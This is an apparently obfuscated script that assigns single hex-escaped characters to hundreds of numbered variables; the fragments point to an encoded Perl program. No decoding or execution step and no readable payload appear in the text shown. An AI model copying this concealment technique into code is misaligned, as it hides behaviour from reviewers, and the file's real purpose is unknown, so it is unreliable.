$fgj54="\x69";
$fgj1292="\x0a";$fgj1671="\x0a";$fgj266="\x61";$fgj841="\x76";$fgj691="\x78";$fgj1694="\x65";$fgj1547="\x65";$fgj354="\x70";$fgj385="\x20";$fgj641="\x72";$fgj397="\x40";
$fgj1196="\x69";$fgj1443="\x72";$fgj1144="\x5f";$fgj60="\x61";$fgj41="\x29";
$fgj1055="\x20";$fgj130="\x76";
$fgj402="\x78";$fgj107="\x20";
$fgj534="\x75";$fgj543="\x63";$fgj1230="\x31";$fgj512="\x6c";$fgj1707="\x61";$fgj502="\x72";$fgj494="\x75";$fgj288="\x68";$fgj1123="\x0a";$fgj646="\x20";
$fgj987="\x2e";$fgj517="\x0a";$fgj355="\x75";$fgj775="\x61";$fgj335="\x28";
$fgj634="\x3c";$fgj1265="\x2c";$fgj1590="\x74";$fgj300="\x68";$fgj1047="\x6d";$fgj1323="\x74";$fgj1377="\x24";$fgj1649="\x72";$fgj1156="\x24";$fgj951="\x69";$fgj1118="\x75";
$fgj305="\x72";$fgj1065="\x76";
$fgj1159="\x3d";$fgj1243="\x24";$fgj1633="\x2d";$fgj1170="\x69";$fgj35="\x69";$fgj748="\x64";$fgj721="\x2c";$fgj789="\x3d";$fgj1223="\x3b";$fgj783="\x31";$fgj6="\x2d";$fgj497="\x64";$fgj1271="\x3d";$fgj1426="\x30";$fgj1023="\x3d";$fgj1659="\x70";
$fgj657="\x24";$fgj235="\x2a";$fgj916="\x22";$fgj84="\x2d";$fgj57="\x20";$fgj23="\x6d";$fgj1342="\x73";$fgj797="\x0a";$fgj1497="\x79";$fgj1163="\x61";$fgj289="\x69";$fgj240="\x65";$fgj742="\x09";$fgj75="\x65";$fgj377="\x6f";$fgj32="\x65";
$fgj834="\x2e";$fgj222="\x61";$fgj848="\x65";$fgj246="\x6e";$fgj1012="\x0a";$fgj292="\x20";$fgj959="\x28";$fgj404="\x73";$fgj213="\x20";$fgj500="\x6f";
$fgj1527="\x6f";$fgj1149="\x6f";
$fgj578="\x6e";$fgj1240="\x3d";$fgj520="\x69";$fgj210="\x73";$fgj1609="\x20";$fgj1266="\x20";$fgj67="\x20";$fgj1175="\x0a";$fgj319="\x3d";$fgj845="\x6e";
$fgj1067="\x72";$fgj393="\x75";
$fgj1647="\x6e";$fgj459="\x77";$fgj76="\x6e";$fgj856="\x72";$fgj72="\x74";$fgj1030="\x27";$fgj992="\x24";$fgj232="\x25";
$fgj629="\x3b";$fgj37="\x65";$fgj418="\x20";$fgj1421="\x61";$fgj1696="\x65";$fgj589="\x5f";$fgj1073="\x3b";$fgj374="\x28";$fgj1697="\x72";
$fgj1629="\x6f";$fgj1533="\x20";$fgj1128="\x79";
$fgj1387="\x7b";$fgj237="\x67";
$fgj1652="\x69";$fgj1221="\x24";$fgj415="\x0a";$fgj243="\x74";
$fgj576="\x72";$fgj1599="\x24";
$fgj532="\x73";
$fgj1192="\x6e";$fgj846="\x61";
$fgj1116="\x73";$fgj645="\x3b";$fgj897="\x65";
$fgj724="\x72";$fgj1140="\x20";
$fgj1132="\x61";
$fgj706="\x65";$fgj768="\x20";
$fgj122="\x6c";$fgj197="\x3d";$fgj169="\x66";$fgj689="\x30";$fgj672="\x74";$fgj1691="\x2b";$fgj1479="\x6f";
$fgj997="\x61";$fgj7="\x70";$fgj388="\x3b";$fgj1364="\x24";
$fgj1673="\x6c";$fgj961="\x30";
$fgj1376="\x20";$fgj567="\x3d";$fgj1167="\x2d";$fgj664="\x2e";
$fgj675="\x22";$fgj1094="\x0a";
$fgj1246="\x5b";
$fgj588="\x64";$fgj663="\x20";
$fgj1036="\x6e";$fgj1431="\x29";$fgj1650="\x61";$fgj1200="\x31";$fgj1428="\x2b";$fgj796="\x7d";
$fgj1187="\x6e";$fgj245="\x6f";$fgj1077="\x09";$fgj1282="\x24";$fgj1142="\x20";$fgj180="\x3d";$fgj477="\x68";$fgj373="\x72";$fgj1236="\x24";
$fgj133="\x73";$fgj622="\x28";
$fgj357="\x68";$fgj1656="\x29";$fgj185="\x09";$fgj1704="\x0a";$fgj1383="\x24";$fgj1448="\x74";$fgj1526="\x20";$fgj276="\x63";$fgj743="\x09";$fgj686="\x5c";
$fgj1334="\x32";$fgj234="\x24";$fgj1492="\x75";$fgj547="\x74";$fgj571="\x0a";$fgj150="\x68";$fgj606="\x63";$fgj752="\x3d";
$fgj1482="\x2c";$fgj550="\x5c";$fgj1139="\x29";$fgj585="\x72";$fgj257="\x6c";$fgj146="\x6d";$fgj100="\x20";$fgj1543="\x20";$fgj1091="\x64";
$fgj825="\x0a";$fgj1577="\x6c";$fgj1174="\x7b";$fgj1405="\x69";$fgj178="\x69";$fgj1566="\x20";$fgj1534="\x73";
$fgj0="\x23";$fgj1125="\x0a";$fgj1287="\x09";$fgj669="\x72";
$fgj605="\x6d";$fgj649="\x24";
$fgj1008="\x22";$fgj613="\x22";
$fgj419="\x72";$fgj1277="\x5b";$fgj660="\x6f";$fgj63="\x65";
$fgj1057="\x65";$fgj1352="\x22";$fgj1506="\x6f";$fgj887="\x20";$fgj1367="\x3d";$fgj219="\x09";$fgj693="\x22";$fgj353="\x09";$fgj1340="\x20";$fgj1576="\x61";
$fgj1578="\x20";$fgj1371="\x20";
$fgj1267="\x24";$fgj858="\x28";$fgj11="\x6c";$fgj1617="\x65";$fgj628="\x30";$fgj1016="\x6d";
$fgj914="\x22";$fgj965="\x29";$fgj963="\x2b";$fgj869="\x20";$fgj865="\x3b";$fgj890="\x09";$fgj1333="\x2b";$fgj151="\x0a";$fgj1553="\x0a";$fgj1289="\x0a";$fgj1681="\x24";$fgj450="\x61";$fgj1120="\x66";
$fgj627="\x20";
$fgj764="\x24";
$fgj408="\x69";$fgj211="\x20";$fgj1523="\x6f";$fgj1605="\x72";
$fgj387="\x29";$fgj970="\x3d";$fgj1623="\x3e";$fgj1682="\x63";$fgj42="\x20";$fgj560="\x3b";$fgj56="\x6e";$fgj857="\x20";$fgj909="\x5f";$fgj1361="\x6d";$fgj1711="\x6e";
$fgj1040="\x27";$fgj468="\x66";$fgj1155="\x20";$fgj410="\x0a";$fgj1624="\x6d";$fgj1161="\x40";$fgj1133="\x31";
$fgj1474="\x69";$fgj50="\x62";
$fgj251="\x09";$fgj1375="\x3c";
$fgj484="\x77";$fgj216="\x3b";
$fgj1219="\x3d";
$fgj840="\x24";$fgj1226="\x09";$fgj13="\x50";$fgj915="\x2e";$fgj711="\x6e";$fgj1535="\x69";$fgj1521="\x74";$fgj1589="\x65";$fgj537="\x6c";$fgj1122="\x65";
$fgj1406="\x6e";$fgj927="\x63";$fgj1141="\x3d";$fgj165="\x20";$fgj969="\x3d";$fgj1574="\x74";$fgj1208="\x65";$fgj117="\x20";$fgj281="\x63";$fgj1427="\x29";$fgj919="\x2e";$fgj739="\x29";
$fgj1042="\x22";$fgj614="\x22";$fgj407="\x24";$fgj1518="\x65";$fgj1592="\x6d";$fgj1177="\x09";$fgj342="\x3b";$fgj624="\x69";$fgj1713="\x3b";$fgj1579="\x3a";$fgj43="\x32";$fgj1368="\x20";$fgj562="\x0a";$fgj809="\x74";$fgj906="\x76";$fgj1245="\x31";
$fgj306="\x69";
$fgj488="\x61";
$fgj1320="\x20";$fgj1401="\x20";
$fgj654="\x0a";$fgj911="\x61";$fgj1000="\x6e";$fgj870="\x3c";
$fgj1464="\x20";$fgj769="\x28";
$fgj1672="\x63";$fgj1088="\x6d";$fgj781="\x29";$fgj1430="\x37";$fgj871="\x20";$fgj1061="\x20";$fgj1524="\x6e";$fgj1512="\x20";$fgj683="\x5c";$fgj4="\x72";
$fgj1537="\x63";$fgj1270="\x20";
$fgj1454="\x0a";
$fgj1626="\x74";$fgj1702="\x6e";
$fgj876="\x72";$fgj78="\x72";$fgj220="\x73";$fgj478="\x65";$fgj1461="\x68";$fgj328="\x20";$fgj1102="\x20";
$fgj1083="\x75";$fgj1248="\x6a";$fgj313="\x72";$fgj1598="\x24";$fgj1335="\x3b";$fgj411="\x09";$fgj594="\x6e";$fgj960="\x32";$fgj548="\x2c";
$fgj593="\x69";$fgj1263="\x24";$fgj36="\x6e";
$fgj526="\x79";$fgj1113="\x65";$fgj1215="\x24";
$fgj1561="\x6f";$fgj1168="\x2d";$fgj1511="\x65";
$fgj1686="\x63";$fgj309="\x0a";
$fgj448="\x74";
$fgj310="\x09";$fgj22="\x20";$fgj265="\x72";
$fgj290="\x63";$fgj1699="\x74";$fgj1013="\x0a";$fgj1467="\x20";$fgj52="\x73";$fgj1648="\x65";
$fgj508="\x6f";$fgj1084="\x72";
$fgj1006="\x69";$fgj964="\x31";$fgj1115="\x5f";
$fgj1433="\x3b";
$fgj896="\x64";$fgj1260="\x61";$fgj1070="\x61";$fgj1414="\x2c";
$fgj652="\x20";$fgj981="\x6d";
$fgj553="\x6e";$fgj687="\x78";$fgj913="\x65";$fgj298="\x20";$fgj64="\x72";$fgj3="\x6f";$fgj685="\x5c";$fgj799="\x09";$fgj1459="\x20";$fgj469="\x6c";$fgj521="\x73";$fgj192="\x72";
$fgj1502="\x0a";$fgj1033="\x61";$fgj1121="\x6c";$fgj1338="\x6d";$fgj456="\x20";$fgj1637="\x72";
$fgj1552="\x65";$fgj239="\x6e";
$fgj1204="\x0a";$fgj247="\x29";$fgj1183="\x20";$fgj1606="\x69";$fgj218="\x0a";$fgj1372="\x24";$fgj1531="\x6f";
$fgj1092="\x65";$fgj1005="\x24";$fgj394="\x73";
$fgj339="\x64";
$fgj99="\x6c";$fgj1485="\x65";
$fgj1233="\x69";$fgj1238="\x5d";$fgj217="\x0a";$fgj113="\x76";$fgj1493="\x20";
$fgj1539="\x20";$fgj39="\x28";
$fgj1189="\x28";$fgj1423="\x64";$fgj70="\x6e";$fgj1262="\x5b";$fgj455="\x6e";$fgj908="\x72";$fgj552="\x69";$fgj1303="\x73";
$fgj750="\x20";$fgj1348="\x20";$fgj607="\x6f";
$fgj1181="\x24";$fgj1418="\x74";
$fgj1549="\x73";$fgj1666="\x20";$fgj618="\x66";$fgj928="\x6f";$fgj112="\x72";$fgj770="\x69";$fgj157="\x20";
$fgj759="\x69";$fgj726="\x28";
$fgj678="\x25";$fgj453="\x20";$fgj438="\x72";$fgj1604="\x70";
$fgj1640="\x61";$fgj1520="\x61";$fgj1214="\x20";$fgj1410="\x22";$fgj1462="\x69";
$fgj80="\x74";$fgj1165="\x3b";$fgj476="\x74";$fgj138="\x73";$fgj1357="\x6f";$fgj291="\x68";$fgj1662="\x6e";
$fgj1308="\x67";$fgj167="\x68";$fgj1081="\x65";$fgj1051="\x65";$fgj196="\x20";$fgj676="\x5c";$fgj200="\x29";$fgj1145="\x3b";$fgj1028="\x63";$fgj888="\x7b";$fgj1396="\x6e";$fgj338="\x6f";$fgj79="\x61";$fgj609="\x65";$fgj595="\x67";
$fgj1434="\x0a";$fgj1703="\x3b";$fgj264="\x72";$fgj451="\x63";$fgj465="\x68";$fgj751="\x2e";$fgj1363="\x20";
$fgj1129="\x20";$fgj816="\x28";$fgj522="\x68";
$fgj1331="\x29";$fgj474="\x23";$fgj1290="\x7d";$fgj1354="\x0a";$fgj716="\x73";$fgj1018="\x6f";$fgj160="\x6f";$fgj788="\x3d";$fgj823="\x6e";$fgj1255="\x0a";$fgj1025="\x22";
$fgj1422="\x6e";$fgj275="\x20";$fgj1283="\x69";$fgj741="\x0a";$fgj383="\x69";$fgj592="\x72";
$fgj929="\x64";$fgj1179="\x79";$fgj907="\x61";$fgj121="\x20";$fgj704="\x61";
$fgj749="\x65";
$fgj976="\x09";$fgj124="\x66";$fgj183="\x3b";
$fgj400="\x64";$fgj58="\x4b";
$fgj299="\x74";$fgj1456="\x0a";$fgj1706="\x76";$fgj1041="\x3b";$fgj1126="\x09";$fgj945="\x24";$fgj1136="\x24";
$fgj490="\x20";$fgj1630="\x72";$fgj337="\x63";$fgj436="\x61";$fgj813="\x76";$fgj979="\x09";$fgj46="\x39";$fgj1222="\x6a";$fgj452="\x6b";$fgj889="\x0a";$fgj525="\x5f";$fgj1117="\x68";
$fgj723="\x6f";$fgj334="\x68";$fgj925="\x24";
$fgj259="\x20";$fgj505="\x74";$fgj1076="\x0a";$fgj215="\x29";$fgj1178="\x6d";
$fgj1252="\x69";$fgj225="\x28";$fgj860="\x69";$fgj650="\x69";$fgj668="\x70";
$fgj1449="\x72";$fgj993="\x22";$fgj369="\x75";$fgj176="\x20";$fgj604="\x24";$fgj1295="\x75";$fgj8="\x65";$fgj590="\x73";
$fgj1202="\x29";$fgj1447="\x73";$fgj1349="\x3d";$fgj523="\x65";$fgj371="\x73";
$fgj1575="\x69";$fgj611="\x3d";
$fgj1010="\x22";$fgj386="\x31";$fgj982="\x63";$fgj656="\x09";$fgj336="\x24";
$fgj1079="\x09";$fgj1517="\x6e";$fgj1551="\x7a";$fgj282="\x74";$fgj511="\x20";
$fgj242="\x61";$fgj561="\x0a";$fgj583="\x3d";$fgj790="\x20";$fgj1315="\x20";$fgj882="\x2b";
$fgj1280="\x2c";$fgj544="\x72";
$fgj1610="\x24";$fgj1457="\x0a";$fgj376="\x63";$fgj423="\x6f";
$fgj1107="\x65";$fgj707="\x2c";$fgj773="\x28";$fgj1439="\x72";$fgj229="\x65";$fgj155="\x6d";$fgj1451="\x6e";$fgj978="\x0a";$fgj1060="\x6c";$fgj1455="\x7d";$fgj745="\x6d";$fgj1098="\x0a";$fgj921="\x3b";$fgj826="\x09";$fgj343="\x20";$fgj998="\x72";$fgj661="\x64";$fgj1209="\x78";$fgj1257="\x09";$fgj1158="\x20";$fgj901="\x20";
$fgj956="\x61";
$fgj171="\x3b";$fgj421="\x6e";$fgj658="\x6d";
$fgj1476="\x65";$fgj153="\x0a";$fgj1668="\x6e";$fgj1007="\x2e";$fgj2="\x6d";$fgj1080="\x72";$fgj637="\x24";$fgj558="\x73";$fgj696="\x2c";$fgj1318="\x20";$fgj623="\x24";$fgj727="\x24";$fgj1026="\x5c";$fgj651="\x29";$fgj1314="\x79";$fgj12="\x20";$fgj174="\x6d";
$fgj318="\x20";$fgj861="\x20";$fgj1712="\x63";$fgj442="\x20";
$fgj326="\x20";$fgj966="\x29";$fgj1264="\x69";$fgj1437="\x0a";$fgj95="\x23";$fgj1532="\x2c";$fgj912="\x6d";$fgj1402="\x73";$fgj936="\x5c";
$fgj1217="\x20";
$fgj1611="\x6e";$fgj1701="\x6f";$fgj1569="\x70";$fgj1436="\x7d";
$fgj413="\x0a";$fgj787="\x20";
$fgj1188="\x74";$fgj791="\x30";$fgj1020="\x65";$fgj766="\x20";$fgj441="\x2c";$fgj81="\x69";$fgj1413="\x22";$fgj368="\x73";$fgj729="\x63";$fgj1203="\x3b";$fgj621="\x20";
$fgj1657="\x3b";$fgj308="\x74";$fgj817="\x29";
$fgj1362="\x79";$fgj1680="\x0a";$fgj1695="\x6e";$fgj1586="\x3d";$fgj1247="\x24";$fgj324="\x24";
$fgj1127="\x6d";$fgj1661="\x69";$fgj228="\x6d";$fgj510="\x65";$fgj231="\x29";
$fgj570="\x3b";$fgj736="\x69";$fgj312="\x6f";$fgj149="\x70";$fgj120="\x6c";$fgj659="\x63";$fgj1235="\x20";$fgj692="\x5c";$fgj1106="\x68";$fgj776="\x6e";
$fgj1212="\x69";$fgj1285="\x3b";$fgj333="\x74";
$fgj1565="\x67";
$fgj267="\x79";$fgj885="\x69";
$fgj202="\x20";$fgj1412="\x63";$fgj1596="\x68";$fgj1330="\x33";$fgj1664="\x20";$fgj467="\x66";$fgj719="\x69";
$fgj712="\x64";$fgj499="\x63";$fgj1453="\x3b";
$fgj320="\x20";$fgj853="\x09";$fgj709="\x24";$fgj666="\x20";
$fgj158="\x24";
$fgj990="\x22";$fgj555="\x65";$fgj821="\x72";$fgj802="\x63";$fgj1111="\x61";
$fgj356="\x73";$fgj1086="\x20";$fgj144="\x74";$fgj948="\x25";$fgj94="\x0a";$fgj895="\x6f";$fgj422="\x64";
$fgj1052="\x20";$fgj1660="\x72";$fgj322="\x3b";$fgj409="\x3b";
$fgj930="\x65";$fgj513="\x61";
$fgj863="\x20";$fgj1607="\x6e";
$fgj844="\x5f";
$fgj1063="\x24";$fgj1498="\x20";$fgj524="\x72";$fgj1345="\x69";$fgj941="\x66";$fgj1191="\x61";$fgj705="\x6d";$fgj25="\x72";$fgj667="\x73";$fgj1572="\x65";$fgj83="\x6e";$fgj466="\x75";$fgj1119="\x66";
$fgj1378="\x6c";$fgj53="\x74";
$fgj125="\x74";$fgj85="\x31";$fgj1468="\x72";$fgj1143="\x40";$fgj740="\x3b";$fgj1341="\x24";$fgj20="\x64";$fgj1104="\x69";$fgj1404="\x72";$fgj509="\x64";$fgj66="\x23";$fgj572="\x09";
$fgj1071="\x6d";$fgj1516="\x65";
$fgj429="\x73";$fgj214="\x28";$fgj1258="\x40";$fgj971="\x20";$fgj401="\x65";$fgj182="\x30";$fgj1382="\x2b";
$fgj1281="\x20";$fgj972="\x30";$fgj1027="\x24";
$fgj457="\x68";$fgj340="\x65";$fgj495="\x69";$fgj1495="\x6e";
$fgj390="\x09";$fgj755="\x5c";$fgj1554="\x23";$fgj31="\x20";
$fgj926="\x6d";$fgj731="\x69";$fgj758="\x20";$fgj700="\x61";
$fgj256="\x69";$fgj920="\x22";$fgj1675="\x73";
$fgj363="\x69";$fgj603="\x20";$fgj82="\x6f";$fgj1715="\x0a";$fgj655="\x09";
$fgj483="\x20";$fgj713="\x65";$fgj850="\x22";
$fgj684="\x22";$fgj1029="\x3d";$fgj1211="\x20";$fgj714="\x78";$fgj617="\x09";
$fgj1465="\x69";$fgj1632="\x68";$fgj284="\x72";$fgj1639="\x6e";$fgj884="\x24";$fgj443="\x6b";$fgj1039="\x65";$fgj434="\x74";$fgj417="\x23";$fgj272="\x74";$fgj1385="\x29";$fgj1538="\x65";$fgj260="\x61";$fgj1176="\x09";$fgj1670="\x3b";$fgj1186="\x69";$fgj15="\x72";$fgj1400="\x3d";$fgj1411="\x25";$fgj984="\x64";
$fgj820="\x74";$fgj380="\x2c";$fgj1665="\x4f";
$fgj255="\x75";
$fgj416="\x09";$fgj697="\x20";$fgj280="\x61";$fgj699="\x76";$fgj175="\x79";$fgj557="\x65";$fgj1322="\x6e";$fgj830="\x6f";$fgj1442="\x75";$fgj985="\x65";$fgj433="\x70";$fgj69="\x6f";$fgj307="\x70";$fgj1625="\x65";
$fgj389="\x0a";
$fgj847="\x6d";$fgj1301="\x64";$fgj378="\x64";
$fgj792="\x29";$fgj498="\x20";
$fgj722="\x20";$fgj1053="\x2e";$fgj630="\x20";$fgj1505="\x63";$fgj1570="\x6f";$fgj862="\x3d";$fgj33="\x6e";$fgj1374="\x20";$fgj428="\x20";$fgj262="\x20";$fgj1705="\x65";$fgj991="\x5c";$fgj1350="\x20";$fgj886="\x29";$fgj977="\x7d";$fgj854="\x66";$fgj814="\x61";$fgj1351="\x22";$fgj1003="\x65";$fgj980="\x24";$fgj757="\x22";$fgj573="\x24";$fgj1310="\x7b";$fgj810="\x65";$fgj341="\x29";$fgj1339="\x79";
$fgj1216="\x69";$fgj1146="\x0a";$fgj1594="\x72";$fgj1001="\x61";$fgj1343="\x74";
$fgj1446="\x24";
$fgj1087="\x24";$fgj541="\x40";$fgj527="\x61";$fgj1090="\x6f";
$fgj186="\x6d";$fgj818="\x20";$fgj1678="\x4f";$fgj506="\x20";$fgj665="\x3d";$fgj87="\x76";$fgj1470="\x63";$fgj795="\x09";
$fgj1022="\x2e";$fgj1329="\x28";$fgj1298="\x72";$fgj1275="\x61";
$fgj569="\x30";$fgj137="\x0a";$fgj1259="\x24";$fgj301="\x65";$fgj440="\x79";$fgj293="\x62";$fgj201="\x2c";$fgj504="\x63";$fgj398="\x69";
$fgj304="\x63";
$fgj384="\x2c";$fgj199="\x28";
$fgj955="\x72";$fgj464="\x73";
$fgj206="\x64";$fgj223="\x6e";$fgj900="\x3d";$fgj1313="\x6d";$fgj1369="\x30";$fgj1224="\x0a";
$fgj596="\x28";$fgj425="\x69";$fgj102="\x69";$fgj746="\x63";$fgj1621="\x2c";$fgj330="\x65";$fgj1134="\x2c";$fgj828="\x6d";$fgj574="\x76";$fgj302="\x20";$fgj942="\x20";$fgj447="\x20";
$fgj1072="\x65";$fgj1085="\x6e";$fgj1089="\x63";$fgj1615="\x6f";$fgj88="\x65";$fgj27="\x68";$fgj71="\x73";$fgj1002="\x6d";$fgj1180="\x20";$fgj800="\x23";
$fgj485="\x65";$fgj1466="\x73";$fgj1395="\x69";$fgj287="\x77";$fgj209="\x65";$fgj439="\x61";$fgj316="\x24";$fgj1242="\x40";
$fgj1641="\x6d";$fgj1643="\x2d";$fgj632="\x69";$fgj1225="\x09";$fgj1356="\x66";$fgj824="\x67";$fgj123="\x65";
$fgj501="\x72";$fgj1162="\x24";$fgj1105="\x73";
$fgj1452="\x67";$fgj1429="\x39";$fgj29="\x6e";
$fgj1218="\x3d";
$fgj808="\x61";$fgj725="\x64";$fgj1546="\x64";$fgj147="\x6f";$fgj1384="\x69";$fgj110="\x73";
$fgj1062="\x5c";$fgj767="\x25";
$fgj881="\x20";$fgj352="\x09";$fgj59="\x72";
$fgj34="\x67";$fgj179="\x20";$fgj414="\x0a";
$fgj28="\x69";$fgj321="\x30";
$fgj1585="\x20";$fgj754="\x22";$fgj1137="\x61";$fgj347="\x69";$fgj872="\x24";$fgj108="\x72";$fgj554="\x64";$fgj528="\x74";$fgj194="\x70";$fgj18="\x63";
$fgj331="\x6e";$fgj922="\x0a";$fgj1355="\x09";$fgj1069="\x6e";$fgj98="\x6c";$fgj1644="\x24";$fgj1441="\x74";$fgj492="\x65";$fgj1499="\x63";$fgj1019="\x64";
$fgj771="\x6e";
$fgj829="\x63";$fgj454="\x6f";$fgj1201="\x29";$fgj653="\x7b";
$fgj701="\x72";$fgj327="\x3c";$fgj106="\x73";
$fgj1685="\x6e";$fgj249="\x0a";$fgj565="\x69";$fgj877="\x69";$fgj129="\x65";$fgj934="\x20";
$fgj1082="\x74";$fgj784="\x29";$fgj1582="\x24";$fgj1154="\x79";$fgj277="\x68";$fgj1300="\x6e";
$fgj177="\x24";$fgj1014="\x09";$fgj899="\x2e";$fgj794="\x0a";$fgj431="\x72";$fgj1550="\x69";$fgj1138="\x32";
$fgj785="\x29";$fgj1284="\x5d";$fgj994="\x2e";$fgj482="\x6f";$fgj317="\x69";
$fgj601="\x6d";$fgj55="\x61";$fgj191="\x63";$fgj582="\x20";$fgj1131="\x24";$fgj1472="\x72";$fgj253="\x20";$fgj135="\x64";$fgj753="\x20";$fgj1653="\x6f";
$fgj136="\x2e";$fgj1655="\x22";
$fgj1690="\x2b";
$fgj866="\x20";$fgj939="\x20";$fgj1710="\x24";$fgj195="\x74";$fgj610="\x20";$fgj827="\x24";$fgj261="\x6e";$fgj473="\x09";$fgj274="\x65";$fgj446="\x70";$fgj1620="\x4f";
$fgj1600="\x63";$fgj1487="\x6e";$fgj734="\x5b";$fgj1683="\x3d";
$fgj1009="\x3b";$fgj269="\x6f";$fgj61="\x68";$fgj460="\x20";$fgj1093="\x3b";
$fgj1635="\x76";$fgj644="\x74";$fgj1066="\x61";$fgj204="\x69";$fgj1370="\x3b";$fgj1198="\x2b";$fgj1593="\x6f";$fgj698="\x24";$fgj954="\x28";$fgj1460="\x74";$fgj329="\x6c";$fgj819="\x73";$fgj89="\x72";$fgj479="\x6d";$fgj905="\x24";$fgj1513="\x34";$fgj515="\x65";$fgj1034="\x72";$fgj563="\x09";$fgj1194="\x28";
$fgj1021="\x20";$fgj1366="\x20";
$fgj1496="\x6c";$fgj9="\x61";$fgj735="\x24";$fgj420="\x61";$fgj1424="\x28";$fgj1503="\x23";$fgj835="\x3d";$fgj1563="\x69";$fgj1250="\x20";$fgj1693="\x67";$fgj673="\x66";$fgj1562="\x77";$fgj51="\x61";$fgj1708="\x6c";$fgj950="\x28";
$fgj238="\x65";
$fgj430="\x63";$fgj278="\x61";$fgj21="\x65";$fgj105="\x74";$fgj1220="\x20";$fgj391="\x09";$fgj780="\x30";
$fgj1197="\x20";$fgj842="\x61";$fgj361="\x63";$fgj747="\x6f";$fgj97="\x41";$fgj1099="\x73";$fgj1324="\x28";$fgj294="\x75";$fgj134="\x65";$fgj491="\x72";
$fgj903="\x5c";$fgj1152="\x28";$fgj647="\x2b";$fgj487="\x63";$fgj1068="\x5f";$fgj715="\x65";$fgj1278="\x24";$fgj944="\x28";$fgj1612="\x63";$fgj1619="\x28";$fgj1147="\x09";$fgj1628="\x6d";$fgj904="\x24";$fgj1500="\x61";$fgj166="\x73";$fgj1032="\x76";$fgj815="\x6c";$fgj1669="\x63";$fgj172="\x0a";$fgj761="\x20";
$fgj1337="\x09";$fgj445="\x65";$fgj268="\x20";$fgj1054="\x3d";
$fgj1195="\x24";$fgj531="\x5f";$fgj1309="\x0a";$fgj1272="\x20";$fgj1663="\x74";$fgj114="\x65";$fgj1597="\x28";$fgj1015="\x24";$fgj940="\x69";$fgj732="\x70";$fgj1206="\x09";$fgj1714="\x0a";$fgj514="\x74";$fgj839="\x24";$fgj1185="\x20";$fgj1403="\x70";$fgj1658="\x0a";$fgj831="\x64";$fgj1164="\x31";$fgj86="\x20";$fgj1622="\x22";
$fgj575="\x61";$fgj1048="\x63";
$fgj507="\x63";
$fgj1541="\x68";$fgj372="\x74";
$fgj1241="\x20";$fgj168="\x69";$fgj1234="\x2c";$fgj1519="\x72";$fgj599="\x0a";$fgj852="\x0a";
$fgj1522="\x69";
$fgj1359="\x20";$fgj375="\x24";$fgj1529="\x20";$fgj472="\x0a";$fgj1667="\x24";$fgj435="\x20";$fgj1471="\x75";
$fgj1651="\x74";
$fgj973="\x29";$fgj1581="\x0a";$fgj1548="\x2d";$fgj851="\x3b";$fgj1279="\x6a";
$fgj710="\x69";
$fgj503="\x65";$fgj1207="\x6e";$fgj1394="\x72";$fgj542="\x73";$fgj463="\x20";$fgj1190="\x72";$fgj720="\x5d";$fgj765="\x69";$fgj1124="\x7b";$fgj212="\x3d";
$fgj273="\x68";$fgj1631="\x70";$fgj26="\x70";$fgj975="\x0a";$fgj602="\x79";$fgj263="\x61";$fgj184="\x0a";$fgj1306="\x69";$fgj952="\x6e";$fgj449="\x72";$fgj207="\x65";$fgj148="\x72";
$fgj1056="\x22";$fgj351="\x0a";
$fgj16="\x6c";$fgj1365="\x69";$fgj1389="\x09";
$fgj989="\x20";$fgj1509="\x75";$fgj19="\x6f";$fgj1677="\x20";$fgj346="\x24";$fgj1231="\x5b";$fgj638="\x23";$fgj344="\x2b";$fgj1684="\x22";$fgj801="\x20";
$fgj639="\x73";$fgj1103="\x66";$fgj538="\x65";$fgj493="\x62";$fgj1075="\x3b";$fgj733="\x74";$fgj73="\x20";$fgj615="\x3b";
$fgj236="\x24";$fgj1399="\x2e";$fgj703="\x6e";
$fgj1059="\x61";
$fgj323="\x20";$fgj717="\x5b";$fgj1004="\x2e";$fgj947="\x20";$fgj48="\x53";$fgj5="\x65";
$fgj1391="\x24";$fgj1688="\x3b";
$fgj1536="\x6e";$fgj1489="\x20";$fgj1501="\x6e";$fgj1580="\x29";$fgj1571="\x6e";$fgj164="\x3d";$fgj586="\x61";$fgj875="\x63";$fgj837="\x22";$fgj1415="\x20";
$fgj1463="\x73";$fgj874="\x73";$fgj1049="\x6f";$fgj1477="\x20";$fgj635="\x3d";$fgj403="\x65";
$fgj566="\x20";$fgj763="\x28";$fgj1249="\x2c";$fgj695="\x22";$fgj1689="\x0a";$fgj208="\x78";$fgj1595="\x70";$fgj475="\x20";
$fgj1114="\x73";$fgj1100="\x75";$fgj1419="\x28";$fgj1358="\x72";$fgj643="\x70";$fgj1182="\x6a";$fgj1602="\x3b";$fgj1205="\x09";$fgj90="\x73";$fgj1507="\x6d";$fgj271="\x20";$fgj986="\x20";$fgj1045="\x09";$fgj1469="\x65";$fgj1692="\x24";
$fgj1288="\x7d";$fgj303="\x73";$fgj14="\x65";$fgj681="\x64";$fgj935="\x22";$fgj1276="\x32";$fgj1380="\x20";$fgj10="\x72";$fgj1256="\x09";
$fgj360="\x73";$fgj1110="\x79";$fgj486="\x20";$fgj518="\x09";$fgj233="\x24";$fgj1645="\x67";$fgj62="\x6d";$fgj65="\x0a";
$fgj1044="\x0a";$fgj946="\x69";$fgj662="\x65";$fgj581="\x65";$fgj119="\x6c";$fgj737="\x5d";
$fgj1525="\x73";
$fgj1588="\x6d";
$fgj1416="\x69";$fgj996="\x76";$fgj163="\x20";$fgj690="\x32";
$fgj626="\x3d";$fgj597="\x29";$fgj625="\x20";$fgj152="\x7b";$fgj671="\x6e";$fgj744="\x24";$fgj1135="\x20";
$fgj1432="\x29";$fgj1344="\x72";$fgj311="\x66";$fgj1636="\x61";
$fgj1674="\x6f";$fgj143="\x65";$fgj1515="\x67";$fgj159="\x63";$fgj937="\x6e";$fgj1373="\x69";$fgj91="\x69";
$fgj252="\x23";$fgj1379="\x3b";
$fgj285="\x73";$fgj533="\x68";$fgj805="\x63";$fgj1269="\x5d";$fgj93="\x6e";$fgj1393="\x74";$fgj1011="\x3b";$fgj1408="\x66";
$fgj382="\x24";$fgj359="\x40";$fgj564="\x24";$fgj188="\x20";$fgj807="\x6c";
$fgj1557="\x73";
$fgj933="\x3d";$fgj1435="\x09";$fgj1332="\x29";
$fgj579="\x61";$fgj974="\x3b";$fgj254="\x62";$fgj1336="\x0a";$fgj549="\x20";$fgj1169="\x24";$fgj883="\x2b";$fgj1420="\x72";$fgj1046="\x24";$fgj1567="\x65";$fgj1311="\x0a";$fgj893="\x6d";$fgj1148="\x66";
$fgj367="\x20";$fgj241="\x72";
$fgj462="\x65";$fgj140="\x62";$fgj559="\x29";
